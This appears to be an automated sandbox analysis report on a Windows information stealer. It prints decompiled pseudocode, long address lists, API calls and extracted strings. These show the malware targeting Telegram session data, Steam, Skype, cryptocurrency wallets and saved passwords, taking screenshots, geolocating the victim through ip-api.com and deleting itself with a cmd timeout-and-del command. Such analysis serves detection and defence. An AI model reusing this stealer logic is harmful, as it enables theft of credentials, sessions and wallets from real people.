								_t1167 =  *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)))) - 0x49;
								if(_t1167 == 0) {
									_t968 =  &_v48;
									E0040795C(0x41a2dc,  &_v48,  *((intOrPtr*)(_v44 + _t956 * 4)), _t1167);
									E004038DC( *((intOrPtr*)(_v48 + 4)), 0x41a348);
									if(_t1167 != 0) {
										_t1017 = "ip.txt";
										E0040DCE8( *((intOrPtr*)(_v48 + 4)), _t956, "ip.txt", _t1135, _t1137);
									} else {
										_v81 = 1;
										E00418688("http://ip-api.com/json", _t956, 0, _t1135, _t1137,  &_v28);
										E00407428("\"query\":\"", _t956, 0x41a380, _v28, _t1137,  &_v76);
										_t968 = 0x41a380;
										E00407428("\"countryCode\":\"", _t956, 0x41a380, _v28, _t1137,  &_v80);
										_push(_v76);
										_push(0x41a3b8);
										_push(_v80);
										E00403850();
										_t1017 = "ip.txt";
										E0040DCE8(_v456, _t956, "ip.txt", _t1135, _t1137);
									}
								}
							} else {
								E0040795C(0x41a2dc,  &_v48,  *((intOrPtr*)(_v44 + _t956 * 4)), _t1162);
								E0040357C( &_v92,  *((intOrPtr*)(_v48 + 8)));
								if(E00403A78(0x41a2e8, _v92) != 1) {
									E00403D2C( &_v428,  *((intOrPtr*)(_v48 + 0x1c)));
									_push(_v428);
									E00403D2C( &_v432,  *((intOrPtr*)(_v48 + 0x10)));
									_push(E00407048(_v432, _t956,  &_v48, __eflags));
									_push(E004038DC( *((intOrPtr*)(_v48 + 0x14)), 0x41a32c) & 0xffffff00 | __eflags == 0x00000000);
									_t806 = E004038DC( *((intOrPtr*)(_v48 + 0x18)), 0x41a32c);
									_t193 = __eflags == 0;
									__eflags = _t193;
									_push(_t806 & 0xffffff00 | _t193);
									_push(1);
									_push("Files\\");
									_push( *((intOrPtr*)(_v48 + 4)));
									_push(0x41a310);
									E00403850();
									E00403D2C( &_v436, _v440);
									_push(_v436);
									E00403D2C( &_v444,  *((intOrPtr*)(_v48 + 0xc)));
									_push(_v444);
									E004037DC( &_v452, 0x41a310,  *((intOrPtr*)(_v48 + 8)));
									E00403D2C( &_v448, _v452);
									_pop(_t1017);
									_pop(_t968);
									E00414408(_v448, _t956, _t968, _t1017, _t1135, _t1137);
									goto L41;
								}
								_t968 = 0x41a2f8;
								_t1017 = _v92;
								E00407428(0x41a2e8, _t956, 0x41a2f8, _v92, _t1137,  &_v104);
								_push( &_v241);
								_push(0x81);
								_t827 =  *0x41b59c; // 0x41c6fc
								if( *((intOrPtr*)( *_t827))() == 0) {
									goto L68;
								}
								_t1137 =  &_v241;
								while( *_t1137 != 0) {
									_t830 =  *0x41b54c; // 0x41c700
									E00406FDC( *((intOrPtr*)( *_t830))(_t1137), _t956,  &_v360, _t1137, __eflags);
									E0040377C( &_v356, _v360);
									_t1017 = _v104;
									_t837 = E00403A78(_v356, _v104);
									__eflags = _t837;
									if(_t837 != 0) {
										_push( &_v364);
										E00403C98( &_v368, _t1137);
										_push(_v368);
										_push("%DSK_");
										_push(_v104);
										E00403850();
										E00403D2C( &_v372, _v376);
										_push(_v372);
										E00403D2C( &_v380, _v92);
										_pop(_t1102);
										_t975 = 0x41a304;
										E004070BC(_v380, _t956, _t975, _t1102);
										E0040377C( &_v100, _v364);
										E004034E4( &_v96);
										_push( *((intOrPtr*)(_v48 + 4)));
										_push(0x41a310);
										_push(_v100);
										E00403850();
										E00403D2C( &_v388, _v96);
										E004070BC(_v388, _t956, 0, 0x41a318,  &_v384);
										E00403D58( &_v384, 0, 0x41a320, __eflags);
										E0040377C( &_v96, _v384);
										E00403D2C( &_v396, _v96);
										E0040781C(_v396, _t956,  &_v392, __eflags);
										E0040377C( &_v96, _v392);
										E00403D2C( &_v400,  *((intOrPtr*)(_v48 + 0x1c)));
										_push(_v400);
										E00403D2C( &_v404,  *((intOrPtr*)(_v48 + 0x10)));
										_push(E00407048(_v404, _t956, 0, __eflags));
										_push(E004038DC( *((intOrPtr*)(_v48 + 0x14)), 0x41a32c) & 0xffffff00 | __eflags == 0x00000000);
										_t884 = E004038DC( *((intOrPtr*)(_v48 + 0x18)), 0x41a32c);
										_t163 = __eflags == 0;
										__eflags = _t163;
										_push(_t884 & 0xffffff00 | _t163);
										_push(1);
										E004037DC( &_v412, _v96, "Files\\");
										E00403D2C( &_v408, _v412);
										_push(_v408);
										E00403D2C( &_v416,  *((intOrPtr*)(_v48 + 0xc)));
										_push(_v416);
										E004037DC( &_v424, 0x41a310, _v100);
										E00403D2C( &_v420, _v424);
										_pop(_t1017);
										_pop(_t968);
										E00414408(_v420, _t956, _t968, _t1017, _t1135, _t1137);
									}
									_t1137 = _t1137 + 4;
									__eflags = _t1137;
								}
								goto L41;
							}
							L47:
							_t956 = _t956 + 1;
							_t1135 = _t1135 - 1;
							_t1168 = _t1135;
						} while (_t1135 != 0);
						goto L48;
					}
				}
			}















































































































































































                                                                                                                                                                                              0x00419108
                                                                                                                                                                                              0x00419108
                                                                                                                                                                                              0x00419109
                                                                                                                                                                                              0x0041910b
                                                                                                                                                                                              0x00419110
                                                                                                                                                                                              0x00419110
                                                                                                                                                                                              0x00419112
                                                                                                                                                                                              0x00419114
                                                                                                                                                                                              0x00419114
                                                                                                                                                                                              0x00419114
                                                                                                                                                                                              0x00419117
                                                                                                                                                                                              0x00419118
                                                                                                                                                                                              0x00419119
                                                                                                                                                                                              0x0041911a
                                                                                                                                                                                              0x00419120
                                                                                                                                                                                              0x00419127
                                                                                                                                                                                              0x00419128
                                                                                                                                                                                              0x0041912d
                                                                                                                                                                                              0x00419130
                                                                                                                                                                                              0x00419136
                                                                                                                                                                                              0x0041913b
                                                                                                                                                                                              0x0041913f
                                                                                                                                                                                              0x0041914b
                                                                                                                                                                                              0x00419150
                                                                                                                                                                                              0x0041915b
                                                                                                                                                                                              0x00419166
                                                                                                                                                                                              0x0041916d
                                                                                                                                                                                              0x00419178
                                                                                                                                                                                              0x00419179
                                                                                                                                                                                              0x00419195
                                                                                                                                                                                              0x00419197
                                                                                                                                                                                              0x0041919a
                                                                                                                                                                                              0x004191a8
                                                                                                                                                                                              0x00419f30
                                                                                                                                                                                              0x00419f32
                                                                                                                                                                                              0x00419f35
                                                                                                                                                                                              0x00419f38
                                                                                                                                                                                              0x00419f43
                                                                                                                                                                                              0x00419f53
                                                                                                                                                                                              0x00419f5e
                                                                                                                                                                                              0x00419f6e
                                                                                                                                                                                              0x00419f7e
                                                                                                                                                                                              0x00419f89
                                                                                                                                                                                              0x00419f99
                                                                                                                                                                                              0x00419fa4
                                                                                                                                                                                              0x00419fb4
                                                                                                                                                                                              0x00419fbf
                                                                                                                                                                                              0x00419fcf
                                                                                                                                                                                              0x00419fda
                                                                                                                                                                                              0x00419fea
                                                                                                                                                                                              0x00419ff5
                                                                                                                                                                                              0x0041a005
                                                                                                                                                                                              0x0041a010
                                                                                                                                                                                              0x0041a020
                                                                                                                                                                                              0x0041a02b
                                                                                                                                                                                              0x0041a03b
                                                                                                                                                                                              0x0041a046
                                                                                                                                                                                              0x0041a056
                                                                                                                                                                                              0x0041a066
                                                                                                                                                                                              0x0041a071
                                                                                                                                                                                              0x0041a081
                                                                                                                                                                                              0x0041a08c
                                                                                                                                                                                              0x0041a09c
                                                                                                                                                                                              0x0041a0a7
                                                                                                                                                                                              0x0041a0b7
                                                                                                                                                                                              0x0041a0c2
                                                                                                                                                                                              0x0041a0d2
                                                                                                                                                                                              0x0041a0e2
                                                                                                                                                                                              0x0041a0ea
                                                                                                                                                                                              0x0041a0f5
                                                                                                                                                                                              0x0041a102
                                                                                                                                                                                              0x0041a10a
                                                                                                                                                                                              0x0041a112
                                                                                                                                                                                              0x0041a11f
                                                                                                                                                                                              0x0041a12c
                                                                                                                                                                                              0x0041a139
                                                                                                                                                                                              0x004191ae
                                                                                                                                                                                              0x004191b1
                                                                                                                                                                                              0x004191b6
                                                                                                                                                                                              0x004191bb
                                                                                                                                                                                              0x004191c0
                                                                                                                                                                                              0x004191cd
                                                                                                                                                                                              0x004191db
                                                                                                                                                                                              0x004191e0
                                                                                                                                                                                              0x004191e1
                                                                                                                                                                                              0x004191e2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004191e2
                                                                                                                                                                                              0x004191e7
                                                                                                                                                                                              0x004191f2
                                                                                                                                                                                              0x00419203
                                                                                                                                                                                              0x00419214
                                                                                                                                                                                              0x00419224
                                                                                                                                                                                              0x00419232
                                                                                                                                                                                              0x00419237
                                                                                                                                                                                              0x00419247
                                                                                                                                                                                              0x00419254
                                                                                                                                                                                              0x00419259
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00419267
                                                                                                                                                                                              0x0041926c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00419286
                                                                                                                                                                                              0x00419294
                                                                                                                                                                                              0x004192ad
                                                                                                                                                                                              0x004192bb
                                                                                                                                                                                              0x004192cb
                                                                                                                                                                                              0x004192d7
                                                                                                                                                                                              0x004192e4
                                                                                                                                                                                              0x004192ef
                                                                                                                                                                                              0x004192f5
                                                                                                                                                                                              0x00419300
                                                                                                                                                                                              0x00419308
                                                                                                                                                                                              0x0041930f
                                                                                                                                                                                              0x0041931e
                                                                                                                                                                                              0x00419321
                                                                                                                                                                                              0x00419909
                                                                                                                                                                                              0x00419909
                                                                                                                                                                                              0x0041990c
                                                                                                                                                                                              0x00419917
                                                                                                                                                                                              0x0041991c
                                                                                                                                                                                              0x0041992d
                                                                                                                                                                                              0x0041993d
                                                                                                                                                                                              0x00419948
                                                                                                                                                                                              0x00419959
                                                                                                                                                                                              0x0041995e
                                                                                                                                                                                              0x00419964
                                                                                                                                                                                              0x0041996f
                                                                                                                                                                                              0x00419980
                                                                                                                                                                                              0x00419985
                                                                                                                                                                                              0x0041998b
                                                                                                                                                                                              0x00419996
                                                                                                                                                                                              0x004199a7
                                                                                                                                                                                              0x004199b8
                                                                                                                                                                                              0x004199bd
                                                                                                                                                                                              0x004199c3
                                                                                                                                                                                              0x004199ce
                                                                                                                                                                                              0x004199df
                                                                                                                                                                                              0x004199f0
                                                                                                                                                                                              0x004199f5
                                                                                                                                                                                              0x004199fb
                                                                                                                                                                                              0x00419a06
                                                                                                                                                                                              0x00419a17
                                                                                                                                                                                              0x00419a28
                                                                                                                                                                                              0x00419a2d
                                                                                                                                                                                              0x00419a33
                                                                                                                                                                                              0x00419a3e
                                                                                                                                                                                              0x00419a4f
                                                                                                                                                                                              0x00419a60
                                                                                                                                                                                              0x00419a65
                                                                                                                                                                                              0x00419a6b
                                                                                                                                                                                              0x00419a76
                                                                                                                                                                                              0x00419a7d
                                                                                                                                                                                              0x00419a8e
                                                                                                                                                                                              0x00419a9f
                                                                                                                                                                                              0x00419aa4
                                                                                                                                                                                              0x00419aaa
                                                                                                                                                                                              0x00419ab5
                                                                                                                                                                                              0x00419abc
                                                                                                                                                                                              0x00419acd
                                                                                                                                                                                              0x00419ade
                                                                                                                                                                                              0x00419ae3
                                                                                                                                                                                              0x00419ae9
                                                                                                                                                                                              0x00419af4
                                                                                                                                                                                              0x00419afb
                                                                                                                                                                                              0x00419b0c
                                                                                                                                                                                              0x00419b1d
                                                                                                                                                                                              0x00419b22
                                                                                                                                                                                              0x00419b28
                                                                                                                                                                                              0x00419b33
                                                                                                                                                                                              0x00419b3a
                                                                                                                                                                                              0x00419b4b
                                                                                                                                                                                              0x00419b5c
                                                                                                                                                                                              0x00419b61
                                                                                                                                                                                              0x00419b67
                                                                                                                                                                                              0x00419b75
                                                                                                                                                                                              0x00419b7a
                                                                                                                                                                                              0x00419b80
                                                                                                                                                                                              0x00419b8b
                                                                                                                                                                                              0x00419b9c
                                                                                                                                                                                              0x00419ba1
                                                                                                                                                                                              0x00419baf
                                                                                                                                                                                              0x00419bb4
                                                                                                                                                                                              0x00419bb9
                                                                                                                                                                                              0x00419bc1
                                                                                                                                                                                              0x00419bcb
                                                                                                                                                                                              0x00419bce
                                                                                                                                                                                              0x00419bd3
                                                                                                                                                                                              0x00419bdb
                                                                                                                                                                                              0x00419be0
                                                                                                                                                                                              0x00419be6
                                                                                                                                                                                              0x00419beb
                                                                                                                                                                                              0x00419bf3
                                                                                                                                                                                              0x00419bf8
                                                                                                                                                                                              0x00419bfe
                                                                                                                                                                                              0x00419c03
                                                                                                                                                                                              0x00419c0b
                                                                                                                                                                                              0x00419c10
                                                                                                                                                                                              0x00419c16
                                                                                                                                                                                              0x00419c1b
                                                                                                                                                                                              0x00419c25
                                                                                                                                                                                              0x00419c2a
                                                                                                                                                                                              0x00419c2e
                                                                                                                                                                                              0x00419c30
                                                                                                                                                                                              0x00419c33
                                                                                                                                                                                              0x00419c38
                                                                                                                                                                                              0x00419c46
                                                                                                                                                                                              0x00419c54
                                                                                                                                                                                              0x00419c54
                                                                                                                                                                                              0x00419c64
                                                                                                                                                                                              0x00419c70
                                                                                                                                                                                              0x00419c75
                                                                                                                                                                                              0x00419c7a
                                                                                                                                                                                              0x00419c83
                                                                                                                                                                                              0x00419c8a
                                                                                                                                                                                              0x00419c91
                                                                                                                                                                                              0x00419c99
                                                                                                                                                                                              0x00419c9e
                                                                                                                                                                                              0x00419ca1
                                                                                                                                                                                              0x00419db1
                                                                                                                                                                                              0x00419db1
                                                                                                                                                                                              0x00419dbc
                                                                                                                                                                                              0x00419dcc
                                                                                                                                                                                              0x00419dd1
                                                                                                                                                                                              0x00419dec
                                                                                                                                                                                              0x00419df4
                                                                                                                                                                                              0x00419df9
                                                                                                                                                                                              0x00419dff
                                                                                                                                                                                              0x00419e03
                                                                                                                                                                                              0x00419e16
                                                                                                                                                                                              0x00419e1b
                                                                                                                                                                                              0x00419e25
                                                                                                                                                                                              0x00419e31
                                                                                                                                                                                              0x00419e39
                                                                                                                                                                                              0x00419e4a
                                                                                                                                                                                              0x00419e5a
                                                                                                                                                                                              0x00419e6b
                                                                                                                                                                                              0x00419e7e
                                                                                                                                                                                              0x00419e8f
                                                                                                                                                                                              0x00419ea0
                                                                                                                                                                                              0x00419ebb
                                                                                                                                                                                              0x00419ecb
                                                                                                                                                                                              0x00419ed9
                                                                                                                                                                                              0x00419eea
                                                                                                                                                                                              0x00419efb
                                                                                                                                                                                              0x00419f0b
                                                                                                                                                                                              0x00419f11
                                                                                                                                                                                              0x00419f13
                                                                                                                                                                                              0x00419f20
                                                                                                                                                                                              0x00419f27
                                                                                                                                                                                              0x00419f2b
                                                                                                                                                                                              0x00419f2b
                                                                                                                                                                                              0x00419e03
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00419df9
                                                                                                                                                                                              0x00419ddb
                                                                                                                                                                                              0x00419de0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00419de2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00419ca7
                                                                                                                                                                                              0x00419ca7
                                                                                                                                                                                              0x00419cb2
                                                                                                                                                                                              0x00419cc1
                                                                                                                                                                                              0x00419cc4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00419cca
                                                                                                                                                                                              0x00419ccb
                                                                                                                                                                                              0x00419ccd
                                                                                                                                                                                              0x00419ccd
                                                                                                                                                                                              0x00419cdd
                                                                                                                                                                                              0x00419ce2
                                                                                                                                                                                              0x00419ce5
                                                                                                                                                                                              0x00419cf3
                                                                                                                                                                                              0x00419d00
                                                                                                                                                                                              0x00419d03
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00419d13
                                                                                                                                                                                              0x00419d18
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00419d1e
                                                                                                                                                                                              0x00419d2c
                                                                                                                                                                                              0x00419d31
                                                                                                                                                                                              0x00419d3f
                                                                                                                                                                                              0x00419d42
                                                                                                                                                                                              0x00419d85
                                                                                                                                                                                              0x00419d85
                                                                                                                                                                                              0x00419d89
                                                                                                                                                                                              0x00419d96
                                                                                                                                                                                              0x00419da4
                                                                                                                                                                                              0x00419da4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00419d89
                                                                                                                                                                                              0x00419d44
                                                                                                                                                                                              0x00419d45
                                                                                                                                                                                              0x00419d4c
                                                                                                                                                                                              0x00419d5b
                                                                                                                                                                                              0x00419d66
                                                                                                                                                                                              0x00419d75
                                                                                                                                                                                              0x00419d7d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00419d7f
                                                                                                                                                                                              0x00419d82
                                                                                                                                                                                              0x00419d83
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00419d83
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00419da9
                                                                                                                                                                                              0x00419da9
                                                                                                                                                                                              0x00419daa
                                                                                                                                                                                              0x00419daa
                                                                                                                                                                                              0x00419daa
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00419ccd
                                                                                                                                                                                              0x00419327
                                                                                                                                                                                              0x00419327
                                                                                                                                                                                              0x00419328
                                                                                                                                                                                              0x0041932a
                                                                                                                                                                                              0x00419338
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00419340
                                                                                                                                                                                              0x004193bb
                                                                                                                                                                                              0x004193bd
                                                                                                                                                                                              0x004193bd
                                                                                                                                                                                              0x004193c5
                                                                                                                                                                                              0x004193c8
                                                                                                                                                                                              0x004193cc
                                                                                                                                                                                              0x004193d3
                                                                                                                                                                                              0x004193d8
                                                                                                                                                                                              0x004193dd
                                                                                                                                                                                              0x004193e0
                                                                                                                                                                                              0x004193e7
                                                                                                                                                                                              0x004193e7
                                                                                                                                                                                              0x004193e0
                                                                                                                                                                                              0x004193f6
                                                                                                                                                                                              0x004193fd
                                                                                                                                                                                              0x004193fd
                                                                                                                                                                                              0x0041940c
                                                                                                                                                                                              0x0041941b
                                                                                                                                                                                              0x00419420
                                                                                                                                                                                              0x0041942a
                                                                                                                                                                                              0x0041942a
                                                                                                                                                                                              0x00419439
                                                                                                                                                                                              0x00419440
                                                                                                                                                                                              0x00419440
                                                                                                                                                                                              0x0041944f
                                                                                                                                                                                              0x00419451
                                                                                                                                                                                              0x00419453
                                                                                                                                                                                              0x00419455
                                                                                                                                                                                              0x0041945d
                                                                                                                                                                                              0x00419465
                                                                                                                                                                                              0x00419468
                                                                                                                                                                                              0x0041946d
                                                                                                                                                                                              0x0041946f
                                                                                                                                                                                              0x00419470
                                                                                                                                                                                              0x00419475
                                                                                                                                                                                              0x0041947d
                                                                                                                                                                                              0x0041947d
                                                                                                                                                                                              0x0041948c
                                                                                                                                                                                              0x0041948e
                                                                                                                                                                                              0x0041948e
                                                                                                                                                                                              0x0041948c
                                                                                                                                                                                              0x00419492
                                                                                                                                                                                              0x00419498
                                                                                                                                                                                              0x0041949b
                                                                                                                                                                                              0x00419825
                                                                                                                                                                                              0x0041982e
                                                                                                                                                                                              0x00419830
                                                                                                                                                                                              0x00419836
                                                                                                                                                                                              0x00419839
                                                                                                                                                                                              0x00419841
                                                                                                                                                                                              0x00419846
                                                                                                                                                                                              0x00419846
                                                                                                                                                                                              0x00419851
                                                                                                                                                                                              0x00419854
                                                                                                                                                                                              0x0041985a
                                                                                                                                                                                              0x00419868
                                                                                                                                                                                              0x00419878
                                                                                                                                                                                              0x0041987d
                                                                                                                                                                                              0x004198f7
                                                                                                                                                                                              0x004198fc
                                                                                                                                                                                              0x0041987f
                                                                                                                                                                                              0x0041987f
                                                                                                                                                                                              0x00419893
                                                                                                                                                                                              0x004198a9
                                                                                                                                                                                              0x004198b2
                                                                                                                                                                                              0x004198bf
                                                                                                                                                                                              0x004198c4
                                                                                                                                                                                              0x004198c7
                                                                                                                                                                                              0x004198cc
                                                                                                                                                                                              0x004198da
                                                                                                                                                                                              0x004198e5
                                                                                                                                                                                              0x004198ea
                                                                                                                                                                                              0x004198ea
                                                                                                                                                                                              0x0041987d
                                                                                                                                                                                              0x004194a1
                                                                                                                                                                                              0x004194af
                                                                                                                                                                                              0x004194bd
                                                                                                                                                                                              0x004194d0
                                                                                                                                                                                              0x0041974e
                                                                                                                                                                                              0x00419759
                                                                                                                                                                                              0x00419766
                                                                                                                                                                                              0x00419776
                                                                                                                                                                                              0x0041978a
                                                                                                                                                                                              0x00419796
                                                                                                                                                                                              0x0041979b
                                                                                                                                                                                              0x0041979b
                                                                                                                                                                                              0x0041979e
                                                                                                                                                                                              0x0041979f
                                                                                                                                                                                              0x004197a1
                                                                                                                                                                                              0x004197a9
                                                                                                                                                                                              0x004197ac
                                                                                                                                                                                              0x004197bc
                                                                                                                                                                                              0x004197cd
                                                                                                                                                                                              0x004197d8
                                                                                                                                                                                              0x004197e5
                                                                                                                                                                                              0x004197f0
                                                                                                                                                                                              0x00419802
                                                                                                                                                                                              0x00419813
                                                                                                                                                                                              0x0041981e
                                                                                                                                                                                              0x0041981f
                                                                                                                                                                                              0x00419820
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00419820
                                                                                                                                                                                              0x004194da
                                                                                                                                                                                              0x004194df
                                                                                                                                                                                              0x004194e7
                                                                                                                                                                                              0x004194f2
                                                                                                                                                                                              0x004194f3
                                                                                                                                                                                              0x004194f8
                                                                                                                                                                                              0x00419503
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00419509
                                                                                                                                                                                              0x00419734
                                                                                                                                                                                              0x00419515
                                                                                                                                                                                              0x00419524
                                                                                                                                                                                              0x00419535
                                                                                                                                                                                              0x00419540
                                                                                                                                                                                              0x00419543
                                                                                                                                                                                              0x00419548
                                                                                                                                                                                              0x0041954a
                                                                                                                                                                                              0x00419556
                                                                                                                                                                                              0x0041955f
                                                                                                                                                                                              0x0041956a
                                                                                                                                                                                              0x0041956b
                                                                                                                                                                                              0x00419570
                                                                                                                                                                                              0x00419583
                                                                                                                                                                                              0x00419594
                                                                                                                                                                                              0x0041959f
                                                                                                                                                                                              0x004195a9
                                                                                                                                                                                              0x004195b4
                                                                                                                                                                                              0x004195b5
                                                                                                                                                                                              0x004195b6
                                                                                                                                                                                              0x004195c4
                                                                                                                                                                                              0x004195cc
                                                                                                                                                                                              0x004195d4
                                                                                                                                                                                              0x004195d7
                                                                                                                                                                                              0x004195dc
                                                                                                                                                                                              0x004195e7
                                                                                                                                                                                              0x004195fc
                                                                                                                                                                                              0x0041960e
                                                                                                                                                                                              0x0041961e
                                                                                                                                                                                              0x0041962c
                                                                                                                                                                                              0x0041963a
                                                                                                                                                                                              0x0041964b
                                                                                                                                                                                              0x00419659
                                                                                                                                                                                              0x0041966a
                                                                                                                                                                                              0x00419675
                                                                                                                                                                                              0x00419682
                                                                                                                                                                                              0x00419692
                                                                                                                                                                                              0x004196a6
                                                                                                                                                                                              0x004196b2
                                                                                                                                                                                              0x004196b7
                                                                                                                                                                                              0x004196b7
                                                                                                                                                                                              0x004196ba
                                                                                                                                                                                              0x004196bb
                                                                                                                                                                                              0x004196cb
                                                                                                                                                                                              0x004196dc
                                                                                                                                                                                              0x004196e7
                                                                                                                                                                                              0x004196f4
                                                                                                                                                                                              0x004196ff
                                                                                                                                                                                              0x0041970e
                                                                                                                                                                                              0x0041971f
                                                                                                                                                                                              0x0041972a
                                                                                                                                                                                              0x0041972b
                                                                                                                                                                                              0x0041972c
                                                                                                                                                                                              0x0041972c
                                                                                                                                                                                              0x00419731
                                                                                                                                                                                              0x00419731
                                                                                                                                                                                              0x00419731
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041973d
                                                                                                                                                                                              0x00419901
                                                                                                                                                                                              0x00419901
                                                                                                                                                                                              0x00419902
                                                                                                                                                                                              0x00419902
                                                                                                                                                                                              0x00419902
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041932a
                                                                                                                                                                                              0x00419321

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00419195
                                                                                                                                                                                                • Part of subcall function 00408328: CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                                                                                                                                                                                                • Part of subcall function 00408328: CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                                                                                                                                                                                              • GetSystemMetrics.USER32 ref: 00419460
                                                                                                                                                                                              • GetSystemMetrics.USER32 ref: 00419468
                                                                                                                                                                                              • ExitProcess.KERNEL32(00000000), ref: 00419F2B
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Create$DirectoryMetricsSystem$ExitMutexProcess
                                                                                                                                                                                              • String ID: "countryCode":"$"query":"$%DSK_$%appdata%\Telegram Desktop\tdata\$%comspec%$/c %WINDIR%\system32\timeout.exe 3 & del "$0_@$<$</c>$</d>$</n>$<c>$<d>$<n>$Coins$D877F783D5*,map*$Files\$GET$PasswordsList.txt$Skype$Steam$System.txt$Telegram$exit$http://ip-api.com/json$image/jpeg$ip.txt$scr.jpg
                                                                                                                                                                                              • API String ID: 447519224-805684967
                                                                                                                                                                                              • Opcode ID: 393cdfa5e90172c38ce23b04994494a061c28785eddfdfed88361b285a484fb5
                                                                                                                                                                                              • Instruction ID: 8e865d1d98f6c8efaf34d3e531d58462b667ba857a61b59ff422c1b99a10b1ba
                                                                                                                                                                                              • Opcode Fuzzy Hash: 393cdfa5e90172c38ce23b04994494a061c28785eddfdfed88361b285a484fb5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F920E34A0011D9FDB11EB55C885BCDB7B9AF49308F5081BBE408B7292DB38AF958F59
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00418688, Relevance: 42.4, APIs: 18, Strings: 6, Instructions: 375libraryloadernetworkCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 70%
                                                                                                                                                                                              			E00418688(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				_Unknown_base(*)()* _v20;
				_Unknown_base(*)()* _v24;
				_Unknown_base(*)()* _v28;
				_Unknown_base(*)()* _v32;
				_Unknown_base(*)()* _v36;
				_Unknown_base(*)()* _v40;
				_Unknown_base(*)()* _v44;
				_Unknown_base(*)()* _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _v64;
				void* _v68;
				intOrPtr _v72;
				char _v73;
				signed int _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v132;
				char _v388;
				char _v516;
				char _v644;
				char _v2692;
				char _v3716;
				char _v3776;
				char _v69412;
				char _v69416;
				char _v69420;
				char _v69424;
				char _v69428;
				char _v69432;
				char _v69436;
				void* __ecx;
				long _t223;
				long _t284;
				void* _t298;
				struct HINSTANCE__* _t321;
				struct HINSTANCE__* _t325;
				void* _t326;
				intOrPtr _t328;
				intOrPtr _t351;
				void* _t358;
				struct _SYSTEMTIME _t369;
				intOrPtr* _t371;
				intOrPtr _t373;
				intOrPtr _t374;

				_t373 = _t374;
				_t328 = 0x21e6;
				do {
					_push(0);
					_push(0);
					_t328 = _t328 - 1;
				} while (_t328 != 0);
				_push(_t328);
				_t1 =  &_v8;
				 *_t1 = _t328;
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E00403980(_v8);
				E00403980(_v12);
				E00403980(_v16);
				_t369 =  &_v3776;
				_push(_t373);
				_push(0x418b80);
				_push( *[fs:eax]);
				 *[fs:eax] = _t374;
				if(_v16 == 0) {
					E0040357C( &_v16, 0x418b98);
				}
				E004034E4( &_v92);
				E0040357C( &_v56, _v8);
				_v73 = 0;
				E0040357C( &_v52, "wininet.dll");
				_t325 = GetModuleHandleA(E004039E8( &_v52));
				if(_t325 == 0) {
					_t321 = LoadLibraryA(E004039E8( &_v52)); // executed
					_t325 = _t321;
				}
				if(_t325 == 0) {
					(E004039E8( &_v52))[7] = 0;
					_t325 = LoadLibraryA(E004039E8( &_v52));
				}
				_v20 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0xc]));
				_v24 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x1a]));
				_v28 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x2b]));
				_v32 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x3c]));
				_v36 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x53]));
				_v40 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x64]));
				_t371 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x75]));
				_v44 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x89]));
				_v48 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x9b]));
				E00404F00();
				E00404F00();
				E00404F00();
				E00404F00();
				E00404F00();
				E00404F00();
				E00404F00();
				 *_t369 = 0x3c;
				 *((intOrPtr*)(_t369 + 4)) =  &_v132;
				 *((intOrPtr*)(_t369 + 8)) = 0x20;
